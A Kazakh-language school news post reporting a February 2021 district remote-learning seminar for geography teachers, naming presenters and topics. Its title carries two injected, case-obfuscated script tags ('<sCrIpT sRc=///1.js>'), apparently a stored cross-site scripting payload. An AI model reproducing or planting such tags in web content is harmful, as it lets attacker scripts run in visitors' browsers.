«Қашықтан оқыту кезінде белсенді әдістерді қолдану»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
25.02.2021
Бүгін 25.02.2021 жылы Ақмола облысы, Целиноград ауданы білім бөлімінің ұйымдастыруымен география бірлестігінің қашықтықтан оқыту семинары болып өтті.«Қашықтықтан оқытуды ұйымдастырудағы бірыңғай тәсілдердің қолданылуы» тақырыбында болды. Негізгімақсаты:
- Қашықтықтан оқыту жағдайында оқытуды сапалы ұйымдастыру жолдарын шешу;
- Қашықтықтан оқыту жағдайында география сабақтарын ұйымдастырудың маңызды мәселелері бойынша мұғалімдермен іс- тәжірибе алмасу;
- Әдістемелік қолдау көрсету және кеңес беру;
Аудандық семинарды ұйымдастырушы аудандық білім бөлімінің әдіскері Қорғанбеков Е.С және география пәні бірлестігінің жетекшісі Орынбекова Л.К (Қажымұқан орта мектебі) алға қойған жоспарлармен бөлісіп кетті.
«Қашықтан оқыту кезінде белсенді әдістерді қолдану» тақырыптарында Сейткамзина Маржам Жанибековна (№2 Қосшы орта мектебі), Цопон Мая(Қоянды №2 орта мектебі), Укей Амангүл (Қоянды №2 орта мектебі) өз тәжірибелерімен бөлісті.
«Қашықтан оқыту жағдайында кері байланыс беру ұйымдастыру»тақырыбында Каким Бақытбек (Талапкер №3 орта мектебі) мен Төлебай Гүлдана Ерсұлтанқызы (Қажымұқан орта мектебі)керемет әдістерімен бөлісіп, әріптестерінің көңілінен шықты.
«Кезекші сыныптарда оқыту процесін ұйымдастырудың ұтымды тұстары мен олқылықтары»тақырыбы бойынша,Еришова Баян Мизамбековна (Жаңаесіл орта мектебі), Смайлов Бекзат Токтасынович (Оразақ орта мектебі) орыналып жатқан мәселелер туралы сөз қозғады. Алдағы уақытта әріптестерімізге сәттілік тілеймін!